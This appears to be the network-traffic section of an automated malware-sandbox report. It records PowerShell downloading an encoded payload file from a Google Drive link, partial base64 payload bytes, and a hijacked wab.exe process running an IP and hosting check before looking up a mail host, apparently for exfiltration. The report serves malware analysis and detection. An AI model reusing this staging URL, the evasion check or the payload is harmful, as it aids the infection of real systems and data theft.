                                                            Apr 18, 2024 21:17:57.331326962 CEST49716443192.168.2.864.233.185.132
                                                            Apr 18, 2024 21:17:57.332716942 CEST4434971664.233.185.132192.168.2.8
                                                            Apr 18, 2024 21:17:57.332778931 CEST49716443192.168.2.864.233.185.132
                                                            Apr 18, 2024 21:17:57.332880974 CEST4434971664.233.185.132192.168.2.8
                                                            Apr 18, 2024 21:17:57.332932949 CEST49716443192.168.2.864.233.185.132
                                                            Apr 18, 2024 21:17:57.334450960 CEST4434971664.233.185.132192.168.2.8
                                                            Apr 18, 2024 21:17:57.334518909 CEST49716443192.168.2.864.233.185.132
                                                            Apr 18, 2024 21:17:57.334578991 CEST4434971664.233.185.132192.168.2.8
                                                            Apr 18, 2024 21:17:57.334634066 CEST49716443192.168.2.864.233.185.132
                                                            Apr 18, 2024 21:17:57.335971117 CEST4434971664.233.185.132192.168.2.8
                                                            Apr 18, 2024 21:17:57.336038113 CEST49716443192.168.2.864.233.185.132
                                                            Apr 18, 2024 21:17:57.336241961 CEST4434971664.233.185.132192.168.2.8
                                                            Apr 18, 2024 21:17:57.336302996 CEST49716443192.168.2.864.233.185.132
                                                            Apr 18, 2024 21:17:57.336337090 CEST49716443192.168.2.864.233.185.132
                                                            Apr 18, 2024 21:17:57.337080956 CEST4434971664.233.185.132192.168.2.8
                                                            Apr 18, 2024 21:17:57.337155104 CEST49716443192.168.2.864.233.185.132
                                                            Apr 18, 2024 21:18:00.586534977 CEST49717443192.168.2.8172.67.74.152
                                                            Apr 18, 2024 21:18:00.586637020 CEST44349717172.67.74.152192.168.2.8
                                                            Apr 18, 2024 21:18:00.586739063 CEST49717443192.168.2.8172.67.74.152
                                                            Apr 18, 2024 21:18:00.588499069 CEST49717443192.168.2.8172.67.74.152
                                                            Apr 18, 2024 21:18:00.588571072 CEST44349717172.67.74.152192.168.2.8
                                                            Apr 18, 2024 21:18:00.809782028 CEST44349717172.67.74.152192.168.2.8
                                                            Apr 18, 2024 21:18:00.809890032 CEST49717443192.168.2.8172.67.74.152
                                                            Apr 18, 2024 21:18:00.811886072 CEST49717443192.168.2.8172.67.74.152
                                                            Apr 18, 2024 21:18:00.811907053 CEST44349717172.67.74.152192.168.2.8
                                                            Apr 18, 2024 21:18:00.812190056 CEST44349717172.67.74.152192.168.2.8
                                                            Apr 18, 2024 21:18:00.817909002 CEST49717443192.168.2.8172.67.74.152
                                                            Apr 18, 2024 21:18:00.864154100 CEST44349717172.67.74.152192.168.2.8
                                                            Apr 18, 2024 21:18:01.115474939 CEST44349717172.67.74.152192.168.2.8
                                                            Apr 18, 2024 21:18:01.115540981 CEST44349717172.67.74.152192.168.2.8
                                                            Apr 18, 2024 21:18:01.115744114 CEST49717443192.168.2.8172.67.74.152
                                                            Apr 18, 2024 21:18:01.119247913 CEST49717443192.168.2.8172.67.74.152
                                                            Apr 18, 2024 21:18:01.229120016 CEST4971880192.168.2.8208.95.112.1
                                                            Apr 18, 2024 21:18:01.344948053 CEST8049718208.95.112.1192.168.2.8
                                                            Apr 18, 2024 21:18:01.345063925 CEST4971880192.168.2.8208.95.112.1
                                                            Apr 18, 2024 21:18:01.345320940 CEST4971880192.168.2.8208.95.112.1
                                                            Apr 18, 2024 21:18:01.513899088 CEST8049718208.95.112.1192.168.2.8
                                                            Apr 18, 2024 21:18:01.563302040 CEST4971880192.168.2.8208.95.112.1
                                                            Apr 18, 2024 21:18:03.771570921 CEST4971880192.168.2.8208.95.112.1
                                                            Apr 18, 2024 21:18:03.887600899 CEST8049718208.95.112.1192.168.2.8
                                                            Apr 18, 2024 21:18:03.887672901 CEST4971880192.168.2.8208.95.112.1

                                                            UDP Packets

                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Apr 18, 2024 21:17:16.432224989 CEST6495153192.168.2.81.1.1.1
                                                            Apr 18, 2024 21:17:16.536953926 CEST53649511.1.1.1192.168.2.8
                                                            Apr 18, 2024 21:17:17.012876034 CEST5221653192.168.2.81.1.1.1
                                                            Apr 18, 2024 21:17:17.119626999 CEST53522161.1.1.1192.168.2.8
                                                            Apr 18, 2024 21:18:00.465214968 CEST5539953192.168.2.81.1.1.1
                                                            Apr 18, 2024 21:18:00.569791079 CEST53553991.1.1.1192.168.2.8
                                                            Apr 18, 2024 21:18:01.122482061 CEST6381753192.168.2.81.1.1.1
                                                            Apr 18, 2024 21:18:01.228168011 CEST53638171.1.1.1192.168.2.8
                                                            Apr 18, 2024 21:18:03.772692919 CEST5863053192.168.2.81.1.1.1
                                                            Apr 18, 2024 21:18:03.899909973 CEST53586301.1.1.1192.168.2.8

                                                            DNS Queries

                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                            Apr 18, 2024 21:17:16.432224989 CEST192.168.2.81.1.1.10x57a0Standard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                            Apr 18, 2024 21:17:17.012876034 CEST192.168.2.81.1.1.10xdcb1Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                            Apr 18, 2024 21:18:00.465214968 CEST192.168.2.81.1.1.10xcd20Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                            Apr 18, 2024 21:18:01.122482061 CEST192.168.2.81.1.1.10x5feeStandard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                            Apr 18, 2024 21:18:03.772692919 CEST192.168.2.81.1.1.10x26efStandard query (0)mail.myhydropowered.comA (IP address)IN (0x0001)false

                                                            DNS Answers

                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                            Apr 18, 2024 21:17:00.426359892 CEST1.1.1.1192.168.2.80xd2d0No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                            Apr 18, 2024 21:17:00.426359892 CEST1.1.1.1192.168.2.80xd2d0No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                            Apr 18, 2024 21:17:16.536953926 CEST1.1.1.1192.168.2.80x57a0No error (0)drive.google.com64.233.185.102A (IP address)IN (0x0001)false
                                                            Apr 18, 2024 21:17:16.536953926 CEST1.1.1.1192.168.2.80x57a0No error (0)drive.google.com64.233.185.138A (IP address)IN (0x0001)false
                                                            Apr 18, 2024 21:17:16.536953926 CEST1.1.1.1192.168.2.80x57a0No error (0)drive.google.com64.233.185.100A (IP address)IN (0x0001)false
                                                            Apr 18, 2024 21:17:16.536953926 CEST1.1.1.1192.168.2.80x57a0No error (0)drive.google.com64.233.185.139A (IP address)IN (0x0001)false
                                                            Apr 18, 2024 21:17:16.536953926 CEST1.1.1.1192.168.2.80x57a0No error (0)drive.google.com64.233.185.101A (IP address)IN (0x0001)false
                                                            Apr 18, 2024 21:17:16.536953926 CEST1.1.1.1192.168.2.80x57a0No error (0)drive.google.com64.233.185.113A (IP address)IN (0x0001)false
                                                            Apr 18, 2024 21:17:17.119626999 CEST1.1.1.1192.168.2.80xdcb1No error (0)drive.usercontent.google.com64.233.185.132A (IP address)IN (0x0001)false
                                                            Apr 18, 2024 21:17:17.687441111 CEST1.1.1.1192.168.2.80xb01bNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                            Apr 18, 2024 21:17:17.687441111 CEST1.1.1.1192.168.2.80xb01bNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                            Apr 18, 2024 21:18:00.569791079 CEST1.1.1.1192.168.2.80xcd20No error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                            Apr 18, 2024 21:18:00.569791079 CEST1.1.1.1192.168.2.80xcd20No error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                            Apr 18, 2024 21:18:00.569791079 CEST1.1.1.1192.168.2.80xcd20No error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                            Apr 18, 2024 21:18:01.228168011 CEST1.1.1.1192.168.2.80x5feeNo error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                            Apr 18, 2024 21:18:03.899909973 CEST1.1.1.1192.168.2.80x26efServer failure (2)mail.myhydropowered.comnonenoneA (IP address)IN (0x0001)false

                                                            HTTP Request Dependency Graph

                                                            • drive.google.com
                                                            • drive.usercontent.google.com
                                                            • api.ipify.org
                                                            • ip-api.com

                                                            HTTP Packets

                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            0192.168.2.849718208.95.112.1806928C:\Program Files (x86)\Windows Mail\wab.exe
                                                            TimestampBytes transferredDirectionData
                                                            Apr 18, 2024 21:18:01.345320940 CEST80OUTGET /line/?fields=hosting HTTP/1.1
                                                            Host: ip-api.com
                                                            Connection: Keep-Alive
                                                            Apr 18, 2024 21:18:01.513899088 CEST174INHTTP/1.1 200 OK
                                                            Date: Thu, 18 Apr 2024 19:18:00 GMT
                                                            Content-Type: text/plain; charset=utf-8
                                                            Content-Length: 5
                                                            Access-Control-Allow-Origin: *
                                                            X-Ttl: 60
                                                            X-Rl: 44
                                                            Data Raw: 74 72 75 65 0a
                                                            Data Ascii: true


                                                            HTTPS Proxied Packets

                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            0192.168.2.84970564.233.185.1024436816C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-04-18 19:17:16 UTC215OUTGET /uc?export=download&id=1OSQaZlkr_7hzp0lSFB9dj3gxcEot-9s5 HTTP/1.1
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                            Host: drive.google.com
                                                            Connection: Keep-Alive
                                                            2024-04-18 19:17:17 UTC1582INHTTP/1.1 303 See Other
                                                            Content-Type: application/binary
                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                            Pragma: no-cache
                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                            Date: Thu, 18 Apr 2024 19:17:16 GMT
                                                            Location: https://drive.usercontent.google.com/download?id=1OSQaZlkr_7hzp0lSFB9dj3gxcEot-9s5&export=download
                                                            Strict-Transport-Security: max-age=31536000
                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                            Content-Security-Policy: script-src 'nonce-GSL59uJ3TBK-2ttTgVwizA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                            Content-Security-Policy: script-src 'unsafe-inline' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                            Cross-Origin-Opener-Policy: same-origin
                                                            Server: ESF
                                                            Content-Length: 0
                                                            X-XSS-Protection: 0
                                                            X-Frame-Options: SAMEORIGIN
                                                            X-Content-Type-Options: nosniff
                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                            Connection: close


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            1192.168.2.84970764.233.185.1324436816C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-04-18 19:17:17 UTC233OUTGET /download?id=1OSQaZlkr_7hzp0lSFB9dj3gxcEot-9s5&export=download HTTP/1.1
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                            Host: drive.usercontent.google.com
                                                            Connection: Keep-Alive
                                                            2024-04-18 19:17:17 UTC4753INHTTP/1.1 200 OK
                                                            Content-Type: application/octet-stream
                                                            Content-Security-Policy: sandbox
                                                            Content-Security-Policy: default-src 'none'
                                                            Content-Security-Policy: frame-ancestors 'none'
                                                            X-Content-Security-Policy: sandbox
                                                            Cross-Origin-Opener-Policy: same-origin
                                                            Cross-Origin-Embedder-Policy: require-corp
                                                            Cross-Origin-Resource-Policy: same-site
                                                            X-Content-Type-Options: nosniff
                                                            Content-Disposition: attachment; filename="Tramwaymen.jpb"
                                                            Access-Control-Allow-Origin: *
                                                            Access-Control-Allow-Credentials: false
                                                            Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, X-Google-EOM, x-goog-ext-124712974-jspb, x-goog-ext-467253834-jspb, x-goog-ext-353267353-bin, x-goog-ext-353267353-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, x-goog-ext-477772811-jspb, x-goog-ext-359275022-bin, x-goog-ext-328800237-jspb, x-goog-ext-202735639-bin, x-goog-ext-223435598-bin, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Request-Time, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, x-goog-maps-api-salt, x-goog-maps-api-signature, x-goog-maps-client-id, X-Goog-Api-Key, x-goog-spanner-database-role, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-Alt-Service, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Android-Cert, X-Goog-Maps-Ios-Uuid, X-Goog-Maps-Android-Uuid, X-Ariane-Xsrf-Token, X-YouTube-Bootstrap-Logged-In, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-Interop-Cohorts, X-Goog-Meeting-Interop-Type, X-Goog-Meeting-OidcIdToken, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-Viewer-Token, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout, x-foyer-client-environment, x-goog-greenenergyuserappservice-metadata, x-goog-sherlog-context, X-Server-Token, x-rfui-request-context, x-goog-nest-jwt
                                                            Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                            Accept-Ranges: bytes
                                                            Content-Length: 428272
                                                            Last-Modified: Thu, 18 Apr 2024 09:01:31 GMT
                                                            X-GUploader-UploadID: ABPtcPrJmmLNszJ_nUhid5_A9k3EbTHFcSxJrxEroyTex3Vd7az4bpWMA5RrzCoOe-ZNiKLZup78fXumMA
                                                            Date: Thu, 18 Apr 2024 19:17:17 GMT
                                                            Expires: Thu, 18 Apr 2024 19:17:17 GMT
                                                            Cache-Control: private, max-age=0
                                                            X-Goog-Hash: crc32c=Y+oLSg==
                                                            Server: UploadServer
                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                            Connection: close
                                                            2024-04-18 19:17:17 UTC4753INData Raw: 63 51 47 62 63 51 47 62 75 36 55 46 47 67 44 72 41 74 79 30 36 77 49 56 6c 41 4e 63 4a 41 54 72 41 71 59 49 36 77 4c 44 32 4c 6d 53 35 46 5a 59 36 77 4c 65 73 2b 73 43 77 52 6d 42 38 51 45 49 72 4e 52 78 41 5a 76 72 41 6d 51 79 67 63 46 74 45 77 56 7a 63 51 47 62 36 77 49 47 48 6e 45 42 6d 33 45 42 6d 37 72 41 77 42 36 41 36 77 4c 44 52 75 73 43 6d 4a 64 78 41 5a 74 78 41 5a 73 78 79 75 73 43 41 4b 5a 78 41 5a 75 4a 46 41 74 78 41 5a 74 78 41 5a 76 52 34 75 73 43 50 65 58 72 41 6f 52 54 67 38 45 45 63 51 47 62 63 51 47 62 67 66 6b 62 7a 65 51 43 66 4d 31 78 41 5a 76 72 41 72 66 71 69 30 51 6b 42 4f 73 43 6b 74 39 78 41 5a 75 4a 77 33 45 42 6d 33 45 42 6d 34 48 44 67 47 74 64 41 58 45 42 6d 2b 73 43 2f 51 71 36 58 56 33 32 31 2b 73 43 6c 35 35 78 41 5a 75
                                                            Data Ascii: cQGbcQGbu6UFGgDrAty06wIVlANcJATrAqYI6wLD2LmS5FZY6wLes+sCwRmB8QEIrNRxAZvrAmQygcFtEwVzcQGb6wIGHnEBm3EBm7rAwB6A6wLDRusCmJdxAZtxAZsxyusCAKZxAZuJFAtxAZtxAZvR4usCPeXrAoRTg8EEcQGbcQGbgfkbzeQCfM1xAZvrArfqi0QkBOsCkt9xAZuJw3EBm3EBm4HDgGtdAXEBm+sC/Qq6XV321+sCl55xAZu
                                                            2024-04-18 19:17:17 UTC4753INData Raw: 5a 4c 4b 42 77 47 31 4f 6c 4b 4b 43 4d 55 34 63 49 61 32 64 76 51 4a 4a 75 63 76 76 6c 38 44 6b 49 76 4c 34 41 50 56 45 37 62 74 73 38 73 33 4a 37 6d 37 47 44 5a 6f 4f 6a 68 56 53 2b 44 69 34 6e 73 69 4f 4b 61 4a 50 58 51 33 6f 77 7a 77 68 51 6b 2f 79 78 73 79 39 48 54 53 50 4c 4a 6b 67 72 4d 6c 6e 44 79 49 63 65 4a 42 78 46 76 4c 4f 6f 41 43 77 44 75 58 51 37 54 75 78 75 62 52 2f 75 4f 54 67 62 79 2b 4b 58 41 59 35 45 7a 79 45 44 41 77 50 73 58 62 59 76 72 55 5a 61 6e 52 6a 69 78 66 48 41 59 73 69 46 53 75 2b 54 74 57 78 56 75 79 73 65 79 33 61 74 46 35 6c 47 55 32 31 49 6e 69 4c 59 50 52 4e 41 59 57 67 65 39 5a 6c 4a 55 78 6b 66 55 53 41 73 38 6e 4f 6a 45 4d 39 31 76 6f 59 7a 76 44 4a 34 49 6d 65 37 4e 4d 78 6c 2f 64 62 35 4a 74 31 34 33 59 42 67 2f 49
                                                            Data Ascii: ZLKBwG1OlKKCMU4cIa2dvQJJucvvl8DkIvL4APVE7bts8s3J7m7GDZoOjhVS+Di4nsiOKaJPXQ3owzwhQk/yxsy9HTSPLJkgrMlnDyIceJBxFvLOoACwDuXQ7TuxubR/uOTgby+KXAY5EzyEDAwPsXbYvrUZanRjixfHAYsiFSu+TtWxVuysey3atF5lGU21IniLYPRNAYWge9ZlJUxkfUSAs8nOjEM91voYzvDJ4Ime7NMxl/db5Jt143YBg/I
                                                            2024-04-18 19:17:17 UTC442INData Raw: 73 4a 62 68 2b 73 70 51 6c 52 75 36 76 6f 66 66 76 35 31 30 4c 37 70 52 48 79 79 59 68 6b 72 6c 6e 45 54 39 4f 4a 50 58 52 6a 6b 2f 33 4f 68 51 67 59 46 78 75 4e 4a 57 78 79 67 6d 6e 42 4a 4c 47 5a 30 61 59 73 47 61 48 79 67 6c 37 76 63 48 4d 33 5a 51 76 2f 54 38 72 49 5a 49 69 58 71 42 55 4f 34 67 76 50 39 58 7a 32 2f 49 42 66 51 4c 47 64 62 6d 50 37 6c 2b 76 56 59 42 65 72 33 50 39 61 36 30 5a 4d 73 74 30 4c 79 36 6a 54 51 44 43 49 6f 34 6a 6c 47 76 38 4c 2b 32 5a 30 48 47 46 66 7a 41 50 75 43 45 34 58 6a 63 41 71 6e 52 72 36 31 4a 37 39 44 56 68 45 46 5a 6a 70 49 6a 38 49 4d 6f 53 51 6e 76 62 6c 69 45 65 37 65 54 44 51 44 72 4c 32 55 74 47 2b 4c 46 50 55 37 37 61 49 5a 4b 34 77 6f 39 30 5a 69 51 31 30 4b 69 4a 49 64 55 59 49 4a 4e 73 4a 6a 48 6f 77 50
                                                            Data Ascii: sJbh+spQlRu6voffv510L7pRHyyYhkrlnET9OJPXRjk/3OhQgYFxuNJWxygmnBJLGZ0aYsGaHygl7vcHM3ZQv/T8rIZIiXqBUO4gvP9Xz2/IBfQLGdbmP7l+vVYBer3P9a60ZMst0Ly6jTQDCIo4jlGv8L+2Z0HGFfzAPuCE4XjcAqnRr61J79DVhEFZjpIj8IMoSQnvbliEe7eTDQDrL2UtG+LFPU77aIZK4wo90ZiQ10KiJIdUYIJNsJjHowP
                                                            2024-04-18 19:17:17 UTC1255INData Raw: 4b 7a 50 59 41 77 6b 6f 6a 6a 4c 77 65 72 79 38 47 52 41 68 65 67 67 6a 51 30 71 39 78 73 53 4e 36 6a 34 46 7a 52 4f 75 55 65 6f 4b 45 6b 2f 63 50 51 42 48 4a 61 5a 51 32 54 2f 32 43 46 43 4b 58 37 59 73 35 36 31 44 30 58 30 51 48 77 64 49 69 66 34 30 38 50 71 42 41 68 61 42 36 31 6d 77 6c 59 32 62 38 53 6d 73 55 7a 48 4e 44 68 78 68 32 30 62 54 47 61 6a 4a 4f 4d 4a 43 39 6a 4d 32 42 75 39 5a 74 55 32 46 73 37 76 7a 49 64 6a 33 61 62 53 64 44 49 6c 30 4c 43 44 62 43 56 43 46 68 59 38 2f 69 67 68 54 31 56 4e 58 74 35 6d 4a 4f 2f 4f 63 75 41 68 65 36 43 73 36 4c 66 42 6a 73 34 41 75 38 65 46 44 54 52 6d 2b 52 33 68 50 4c 39 57 68 31 4e 61 6c 2f 49 68 56 50 41 36 54 66 2b 39 6d 4f 31 71 7a 6d 6a 44 36 74 4e 46 34 55 5a 38 5a 45 49 6e 37 4d 32 73 47 6e 39 46
                                                            Data Ascii: KzPYAwkojjLwery8GRAheggjQ0q9xsSN6j4FzROuUeoKEk/cPQBHJaZQ2T/2CFCKX7Ys561D0X0QHwdIif408PqBAhaB61mwlY2b8SmsUzHNDhxh20bTGajJOMJC9jM2Bu9ZtU2Fs7vzIdj3abSdDIl0LCDbCVCFhY8/ighT1VNXt5mJO/OcuAhe6Cs6LfBjs4Au8eFDTRm+R3hPL9Wh1Nal/IhVPA6Tf+9mO1qzmjD6tNF4UZ8ZEIn7M2sGn9F
                                                            2024-04-18 19:17:17 UTC1255INData Raw: 48 62 6b 66 68 45 5a 66 52 72 37 52 66 69 78 75 6d 2b 31 41 51 71 43 78 36 75 33 2f 32 45 68 44 6c 71 53 37 78 31 68 47 6a 59 50 4b 6e 38 6c 4a 75 57 38 35 2f 6c 5a 6f 64 34 5a 70 46 6e 46 59 43 68 4f 71 74 38 46 6b 6b 59 78 76 6c 31 62 6e 75 32 73 72 45 76 38 2f 5a 74 77 50 4d 72 4b 34 77 44 6d 4b 67 2b 59 37 5a 52 6e 46 67 66 6c 6c 41 6d 68 69 4f 55 66 4b 6a 64 32 49 72 49 72 2b 49 61 49 4a 6b 62 61 6a 2f 71 63 57 4a 37 5a 57 51 56 68 43 49 63 56 51 79 66 5a 33 51 38 67 48 4b 4a 51 52 65 74 32 52 49 4f 79 62 52 66 4e 53 63 46 69 57 4a 7a 30 67 6a 67 6e 59 42 46 6f 48 6f 57 62 75 56 4d 4a 76 2f 47 51 58 55 41 68 75 30 2f 78 39 4c 36 4c 4e 7a 6b 44 46 56 58 46 52 70 38 49 6f 67 69 61 33 45 55 57 39 70 55 6c 61 43 7a 61 49 4a 43 56 44 64 74 77 72 62 7a 56
                                                            Data Ascii: HbkfhEZfRr7Rfixum+1AQqCx6u3/2EhDlqS7x1hGjYPKn8lJuW85/lZod4ZpFnFYChOqt8FkkYxvl1bnu2srEv8/ZtwPMrK4wDmKg+Y7ZRnFgfllAmhiOUfKjd2IrIr+IaIJkbaj/qcWJ7ZWQVhCIcVQyfZ3Q8gHKJQRet2RIOybRfNScFiWJz0gjgnYBFoHoWbuVMJv/GQXUAhu0/x9L6LNzkDFVXFRp8Iogia3EUW9pUlaCzaIJCVDdtwrbzV
                                                            2024-04-18 19:17:17 UTC1255INData Raw: 74 75 50 49 2b 78 33 30 49 44 71 46 46 6a 56 5a 41 4d 54 77 55 4a 39 38 43 67 5a 2b 6d 6a 2b 6f 76 53 69 54 31 30 36 2b 55 43 38 77 73 4d 4c 51 65 76 36 4c 6f 42 4d 34 32 50 64 43 4b 4a 34 41 37 71 62 72 76 52 65 36 4e 6e 4e 6d 65 4a 34 42 56 6a 33 78 48 5a 6d 31 67 51 37 4a 4b 48 6f 71 78 57 77 77 70 63 2b 43 6f 58 4d 6b 6c 6d 46 77 55 2f 52 79 46 7a 32 69 46 48 55 63 50 55 36 39 4a 69 55 59 68 6b 72 67 74 4b 72 6d 68 66 74 6a 76 68 58 63 50 52 5a 57 33 73 4d 32 69 4a 2f 6d 67 51 36 57 7a 52 5a 55 70 78 58 77 69 42 46 6d 63 37 67 69 55 54 47 57 31 31 4b 52 38 42 41 72 42 53 49 53 74 74 47 31 64 68 43 4d 42 42 4b 4a 79 78 42 75 6e 6c 41 75 2f 37 39 61 53 41 70 38 64 64 57 46 50 61 6e 48 42 49 39 51 47 42 55 77 33 49 5a 64 75 51 53 6b 4d 75 54 67 33 5a 32
                                                            Data Ascii: tuPI+x30IDqFFjVZAMTwUJ98CgZ+mj+ovSiT106+UC8wsMLQev6LoBM42PdCKJ4A7qbrvRe6NnNmeJ4BVj3xHZm1gQ7JKHoqxWwwpc+CoXMklmFwU/RyFz2iFHUcPU69JiUYhkrgtKrmhftjvhXcPRZW3sM2iJ/mgQ6WzRZUpxXwiBFmc7giUTGW11KR8BArBSISttG1dhCMBBKJyxBunlAu/79aSAp8ddWFPanHBI9QGBUw3IZduQSkMuTg3Z2
                                                            2024-04-18 19:17:17 UTC1255INData Raw: 2b 64 55 63 33 74 35 67 47 63 79 2b 36 55 75 79 58 45 4c 54 47 72 36 4c 38 65 31 49 32 36 44 62 46 79 6b 41 59 6a 4b 48 4f 57 50 49 31 65 70 63 36 4f 39 56 31 6f 59 61 78 4d 32 6e 69 54 32 6f 51 44 59 67 53 65 39 66 74 66 56 67 35 52 48 69 41 67 4a 32 52 38 56 43 31 43 4b 78 4f 47 45 39 34 55 67 4a 6b 72 54 30 41 78 4d 6c 51 45 57 4f 55 58 35 57 41 50 53 57 35 79 36 4f 77 62 2f 74 6e 6d 41 76 56 50 4b 4a 4a 6f 5a 65 39 41 4e 33 38 4d 54 4b 32 33 64 4e 66 74 7a 71 6b 75 49 33 79 43 4b 6c 44 2f 72 6a 6e 6b 57 73 30 53 6b 2b 31 32 72 4e 63 44 67 55 69 45 42 6e 52 52 53 69 67 68 65 37 77 71 77 7a 7a 73 4c 2f 34 51 44 2f 48 79 49 70 2b 2f 38 5a 2b 59 4c 2f 32 46 4f 56 4b 46 5a 7a 41 50 6f 43 47 67 58 4d 66 38 76 6b 6d 6d 6a 37 6c 31 6a 45 50 7a 48 57 45 38 6b
                                                            Data Ascii: +dUc3t5gGcy+6UuyXELTGr6L8e1I26DbFykAYjKHOWPI1epc6O9V1oYaxM2niT2oQDYgSe9ftfVg5RHiAgJ2R8VC1CKxOGE94UgJkrT0AxMlQEWOUX5WAPSW5y6Owb/tnmAvVPKJJoZe9AN38MTK23dNftzqkuI3yCKlD/rjnkWs0Sk+12rNcDgUiEBnRRSighe7wqwzzsL/4QD/HyIp+/8Z+YL/2FOVKFZzAPoCGgXMf8vkmmj7l1jEPzHWE8k
